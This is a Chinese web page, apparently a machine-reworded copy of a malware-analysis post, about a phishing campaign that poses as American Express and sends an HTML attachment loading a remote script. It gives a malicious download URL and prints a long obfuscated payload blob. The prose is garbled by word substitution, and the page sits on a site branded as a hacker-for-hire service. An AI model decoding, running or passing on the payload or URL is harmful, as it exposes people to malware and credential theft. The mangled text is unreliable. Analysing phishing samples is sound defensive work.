揭秘美国运通 *** 垂钓活动
咱们看到许多针对电子邮件、银行、PayPal、信用卡以及其他财政凭证的网上欺诈活动。本事例与其他许多事例略有不同,愈加杂乱,旨在加大反 *** 垂钓东西进行剖析和阻挠的难度。它伪装成美国运通发送给客户有关帐户中“发作过错的音讯”。
他们运用电子邮件地址和主题来招引用户阅览电子邮件并翻开附件。而很大一部分都是针对中小型企业的,由于他们期望得到比个人用户更好的回应。
现在能够经过咱们的提交体系(Submissions system)提交可疑网站,电子邮件和文件。
请记住,许多电子邮件客户端,尤其是手机或平板电脑上的电子邮件客户端,仅显现“发件人”的称号,而不是中的姓名。这便是为什么这些圈套和 *** 垂钓运作杰出的原因。
0,,1_09030–AENA2019_1228,01.htm VirusTotal | AnyrunApp | downloads https://emiuk.org/style/indexVirusTotal |
此电子邮件不是来自美国运通或Amnex.com。此 *** 垂钓攻击中的一切站点和公司都是假的。
电子邮件如下所示:
American Express垂钓邮件
这封电子邮件有一个html附件,翻开时只包括一个从长途受感染网站运转脚本的简略阐明:
下载脚本,则会看到我自己无法轻松解码的编码/加密文件:
var i,t=”3c12134434f74345405955044542096827476d26c82045015524224c04934332082202d92f02f55733364372f22f34495454462075804875424d44c12023162e93052045337477276966377412f92f64524e82262072216827457447063a42f02f37727707702e47753322e76f17216722f65455292f47826867456d16c33182f04495454422f27806867486d56c63122d77377427226926347492e46467426412223e10a53c46887416d66c12007866d16c56e87343d62756837427427053a02f02f77727727722e27773382e46f87216762f43153943963912f67866887476d26c72712097826d46c13a56c06116e56773d42786506e72763e90a23c56806586106453e30a63c77496937466c76563e34d97952064146d76527246996376126e42064527827027216547377312037c82074166346356f57586e27432055057226f16626966c86542007c82023132026f96652043212073c82f97496927476c76583e20a23c46c16956e76b62007497977036563d62287466547817492f66307357312222027206516c13d22297387407926c16547336866526597472222076817286536693d52276807457447017303a62f32f33063343746383343633192e66e56547497316f66c96896f87367402e66306f06d12f86116563633323076493653303153703556243643393733216342f74106367446907656534376f66e97476576e17462f86387397312f66697566966444677927094426516636137556c17432e26357347372282012f43e80a83c26c06956e06b92047226556c33d92227387467946c86587356816526517422262037487907016563d12267456597887452f46397357392212006436107426122d76377307362d27517286943d42246877427447097393a52f52f43053343706303333653102e56e66537457386f56c36866f57397482e76386f36d12f26116543673303036423663383183703596293643353793296312f34156307486987666544386f56e27466586e47482f06387367302f26687576906474c86107266726562e66317387392262086486157456132d36416557696906306582d06287546316b06537483d12216c66127286796582242f13e60a43c86c56936e36b12077276526c23d62237327457936c16507356826546537432252007467947006543d92217406537897462f76327377342202006476177436102d26367317332d27537276953d72236867437477077383a62f82f83003383756373303623122e16e26597487356f06c06826f17337442e56316f06d32f46176563623343046493633333193713596273623313793236342f94116307496927626514366f76e67476586e07422f56377357302f26647536956434d56556416977566d12e06317317322212006446147426102d16496587696996316552d66267566386b06597443d42256d96566426967576d32272f83e50a83c96c06926e16b12047216596c43d02207397477966c56557376856506527402292087437967056573d32247436527847432f56367347302272046446187446142d56317307312d97567216913d72216897407477057383a12f92f13043333746393303693102e76e36547457386f96c16806f97327492e66336f06d32f56196543623343026433643333183783586283683383783256322f34116307426927606524356f96e87496506e27442f96367377342f86617586926495366d16176c46c92e56307317382222026416157426142d06426537696936356542d26217516376b06527453d32217326d46186c76c42242f73e60a33c92f86856546116493e50a43c32152d72d85b96906602019c77412034934542053755d93e43c26236f86407992026306c86177347393d72204135805055f14386546e17496557294306f96e27446546e87432086916573672019567392d16556e62263e43c32165b86546e16406926665d12d12d23e00a23c22132d62d75b16906662024974532043745d33e53c96206f26447942096336c86107337313d72254135805065f54326596e17406507224366f36e97406576e37432036936533752087577342d16556e52243e73c32105b06546e66456976655d72d72d63e90a33c92192d32d75b26976602064904562043885d13e62043c66216f16407912019346c76177317323d42294185845035f84336566e57466547254326f46e27476536e37432076906543882007557302d56526e72273e53c22165b46566e96426996665d72d52d03e30a83c52152d52d85b86996662094934552093995d53e42023c36216f76467982026326c76147317333d22274145865055f94316516e87406507244396f46e07496536e67442066996553932067547362d86516e02203e53c32185b96596e36496906645d82d12d53e30a13c92132d02d35b96946692092104934555d43e92d42d63e90a43c16226f26417912066306c26117397343d72224155865055f64396546e07486547214316f06e57416546e27412097537332d26556e52094165885005f55226577377086f46e27346947676552223e23c62142d22d23c62165b46576e66476916685d32d62d73e90a53c86446987662019966403d42217246517367076f46e27326967656585737296157097076567275f06d36156996e92233e40a83c06466957602006966453d22237236567367056f36e17346967606505757276177037086517295f87307536222283e30a93c36436997602096926433d22294994e86127604826586116426547292292086376c06177367313d02286306c46586147286676947872203e70a03c96d76587426182006817407437052d96537147576947613d32264326f26e67466506e07442d85447927086522222086306f06e07496516e17493d42277486587817452f26837496d86c53b12056326816157277306507493d85535424672d43822272032f4
[1] [2] 黑客接单网
相关文章
新手攻略:DVWA-1.9全等级教程之SQL Injection
现在,最新的DVWA现已更新到1.9版别(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版别,且没有针对DVWA high等级的教程,因而萌发了一个编撰新手教程的主意,过错的...
浅谈RASP技能攻防之根底篇
本文就笔者研讨RASP的进程进行了一些概述,技能干货略少,倾向于遍及RASP技能。中心对java怎么完成rasp技能进行了简略的举例,想对咱们起到抛砖引玉的效果,能够让咱们更好的了解一些关于web运用...
电商安全无小事,怎么有效地抵挡 CSRF 进犯?
现在,咱们绝大多数人都会在网上购物买东西。可是许多人都不清楚的是,许多电商网站会存在安全缝隙。比方乌云就通报过,国内许多家公司的网站都存在 CSRF 缝隙。假如某个网站存在这种安全缝隙的话,那么咱们...
探究Flask/Jinja2中的服务端模版注入(一)
假如你还没听说过SSTI(服务端模版注入),或许对其还不够了解,在此之前主张咱们去阅览一下James Kettle写的一篇文章。 作为一名专业的安全从事人员,咱们的作业便是协助企业安排进行危险决议计划...
企业安全体系架构分析:开发安全架构之防CC攻击脚本编写-黑客接单平台
今日想共享一下安全脚本的编写,以防CC脚本举个比如。 工作是这样发作的,因为商业竞赛火热,不免有些公司会呈现歹意竞赛的现象,其实CC进犯算是最简略施行的一种DDoS类别进犯吧,在之前我地点的公司就遭...
新手攻略:DVWA-1.9全等级教程之CSRF
现在,最新的DVWA现已更新到1.9版别(http://www.dvwa.co.uk/),而网上的教程大多停留在旧版别,并且没有针对DVWA high等级的教程,因而萌发了一个编撰新手教程的主意,过错...
Copyright Your WebSite.Some Rights Reserved.
免责声明:本站所发布的任何网站,全部来源于互联网,版权争议与本站无关。仅供技术交流,如有侵权或不合适,请联系本人进行删除。不允许做任何非法用途!